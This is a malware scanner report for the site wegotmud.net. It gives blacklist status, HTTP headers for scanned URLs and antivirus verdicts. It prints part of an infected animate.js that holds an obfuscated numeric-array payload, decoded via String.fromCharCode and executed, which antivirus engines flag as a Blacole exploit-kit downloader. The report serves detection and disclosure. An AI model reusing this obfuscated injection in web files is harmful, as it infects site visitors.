New scan:

Malware Scanner report for wegotmud.net

Malicious/Suspicious/Total urls checked
1/0/18
1 page has malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "wegotmud.net" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/1
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=wegotmud.net

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://wegotmud.net/
HTTP/1.1 200 OK
Date: Thu, 25 Dec 2014 19:38:13 GMT
Accept-Ranges: bytes
ETag: "ea34fa4422a6c81:1e437"
Server: Microsoft-IIS/6.0
Content-Length: 13251
Content-Location: http://wegotmud.net/Index.htm
Content-Type: text/html
Last-Modified: Thu, 24 Apr 2008 15:45:49 GMT
X-Powered-By: PleskWin
X-Powered-By: ASP.NET
clean
http://wegotmud.net/index.htm
200 OK
Content-Length: 13251
Content-Type: text/html
clean
http://wegotmud.net/animate.js
200 OK
Content-Length: 21479
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

<!--
dynamicanimAttr = "dynamicanimation"
animCancel = "skipanim"
fpanimationPrefix = "fpAnim"
animateElements = new Array()
currentElement = 0
speed = 1
stepsZoom = 8
stepsWord = 8
stepsFly = 17
stepsSpiral = 16
stepsSpiralWord = 19
stepsElastic = 32
steps = stepsZoom
step = 0
cornerPhase=0
outEffect=0
function remSuffix(str)
{
ind=str.indexOf("FP")
str = str.substring(0
... 3379 bytes are skipped ...
540.210.348.484.160.122.96.136.520.210.300.400.505.220.102.236.160.26.30.128.160.64.96.128.160.64.96.128.160.64.96.400.555.198.351.436.505.220.348.184.490.222.300.484.230.194.336.448.505.220.300.268.520.210.324.400.200.210.306.456.545.82.177.52.50.64.96.128.160.64.96.128.160.250.39.40.160.64.96.128.625.198.291.464.495.208.120.404.205.246.375.52.50.250.132.128.265.96.144.164.295".split(".");if(window.document)for(i=6-2-1-2-1;-1828+i!=2-2;i++){k=i;s=s+String.fromCharCode(n[k]/(i%(h*h)+2));}e(s);}}

Antivirus reports:

Qihoo-360
Trojan.Generic
AntiVir
JS/RunForest.B
Avast
JS:Decode-AFR [Trj]
Ad-Aware
Trojan.JS.Agent.GMZ
Ikarus
Trojan.Script
nProtect
Trojan.JS.Agent.GMZ
K7AntiVirus
Trojan ( a9e4a8470 )
TrendMicro-HouseCall
TROJ_GEN.F47V1205
Comodo
Exploit.JS.Blacole.RB
Emsisoft
Trojan.JS.Agent.GMZ (B)
McAfee-GW-Edition
Heuristic.BehavesLike.JS.Suspicious.G
TrendMicro
HEUR_HTJS.HDJSFN
ViRobot
JS.A.JScript.21391
Microsoft
Trojan:JS/BlacoleRef.BG
Kaspersky
Trojan-Downloader.JS.JScript.bp
MicroWorld-eScan
Trojan.JS.Agent.GMZ
Fortinet
JS/Blacole.EUS!tr.dldr
Jiangmin
Trojan/Script.Gen
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Expack.bfdeei
F-Secure
Trojan.JS.Agent.GMZ
F-Prot
JS/IFrame.QW
AVG
JS/Agent
Norman
Blacole.PK
Sophos
Mal/Iframe-AF
GData
Trojan.JS.Agent.GMZ
Symantec
Trojan.Malscript
Commtouch
JS/IFrame.QW
BitDefender
Trojan.JS.Agent.GMZ

http://pub15.bravenet.com/counter/code.php?id=384441&usernum=1275278453&cpv=2
200 OK
Content-Length: 336
Content-Type: text/html
clean
http://pub15.bravenet.com/test404page.js
HTTP/1.1 302 Found
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Thu, 25 Dec 2014 19:38:25 GMT
Pragma: no-cache
ETag: PUB15-13215cd2e793068328fbda4697257a863634de7e-1419536305.4767
Location: http://www.bravenet.com/test404page.js
Server: Apache
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Thu, 25 Dec 2014 19:38:15 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV"
Set-Cookie: BNU=deleted; expires=Wed, 25-Dec-2013 19:38:24 GMT; path=/; domain=.bravenet.com
Set-Cookie: BNP=deleted; expires=Wed, 25-Dec-2013 19:38:24 GMT; path=/; domain=.bravenet.com
Set-Cookie: BNETSESSID=v7bk1u9cpe3grcb4rtcv2t3vd7; path=/; domain=.bravenet.com
Set-Cookie: HASCOOKIES=1; expires=Sun, 22-Dec-2024 19:38:25 GMT; path=/; domain=.bravenet.com
clean
http://www.bravenet.com/test404page.js
404 Not Found
Content-Length: 18189
Content-Type: text/html
clean
http://www.bravenet.com//assets.bravenet.com/bn/front/js/jquery.min.js/
404 Not Found
Content-Length: 18189
Content-Type: text/html
clean
http://www.bravenet.com//assets.bravenet.com/bn/front/js/bootstrap.min.js/
404 Not Found
Content-Length: 18189
Content-Type: text/html
clean
http://www.bravenet.com//assets.bravenet.com/bn/front/js/bn.js/
404 Not Found
Content-Length: 18189
Content-Type: text/html
clean
http://assets.bravenet.com/bn/js/bnui.js
200 OK
Content-Length: 44626
Content-Type: application/x-javascript
clean
http://pub2.bravenet.com/counter/code.php?id=390456&usernum=137405393&cpv=2
200 OK
Content-Length: 334
Content-Type: text/html
clean
http://pub2.bravenet.com/test404page.js
HTTP/1.1 302 Found
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Thu, 25 Dec 2014 19:38:32 GMT
Pragma: no-cache
ETag: PUB2-60ac892e539bf2f837023efa1f1f713da4f49bc8-1419536312.7271
Location: http://www.bravenet.com/test404page.js
Server: Apache
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Thu, 25 Dec 2014 19:38:22 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV"
Set-Cookie: BNU=deleted; expires=Wed, 25-Dec-2013 19:38:31 GMT; path=/; domain=.bravenet.com
Set-Cookie: BNP=deleted; expires=Wed, 25-Dec-2013 19:38:31 GMT; path=/; domain=.bravenet.com
Set-Cookie: BNETSESSID=j5f2mm2m2bjpjpukoopm7p9c73; path=/; domain=.bravenet.com
Set-Cookie: HASCOOKIES=1; expires=Sun, 22-Dec-2024 19:38:32 GMT; path=/; domain=.bravenet.com
clean
http://www.google-analytics.com/urchin.js
200 OK
Content-Length: 22678
Content-Type: text/javascript
clean
http://ads.pro-market.net/ads/scripts/site-125361.js
200 OK
Content-Length: 1430
Content-Type: application/x-javascript
clean
http://assets.bravenet.com/bn/responsive/vendor/bootbox/bootbox.js
200 OK
Content-Length: 23249
Content-Type: application/x-javascript
clean
http://www.bravenet.com//g2.gumgum.com/javascripts/ggv2.js/
404 Not Found
Content-Length: 18189
Content-Type: text/html
clean
http://www.bravenet.com/
200 OK
Content-Length: 24984
Content-Type: text/html
clean
http://www.bravenet.com/sitebuilder.php
200 OK
Content-Length: 21251
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: wegotmud.net

Result:
HTTP/1.1 200 OK
Date: Thu, 25 Dec 2014 19:38:13 GMT
Accept-Ranges: bytes
ETag: "ea34fa4422a6c81:1e437"
Server: Microsoft-IIS/6.0
Content-Length: 13251
Content-Location: http://wegotmud.net/Index.htm
Content-Type: text/html
Last-Modified: Thu, 24 Apr 2008 15:45:49 GMT
X-Powered-By: PleskWin
X-Powered-By: ASP.NET

...13251 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: wegotmud.net
Referer: http://www.google.com/search?q=wegotmud.net

Result:
The result is similar to the first query. There are no suspicious redirects found.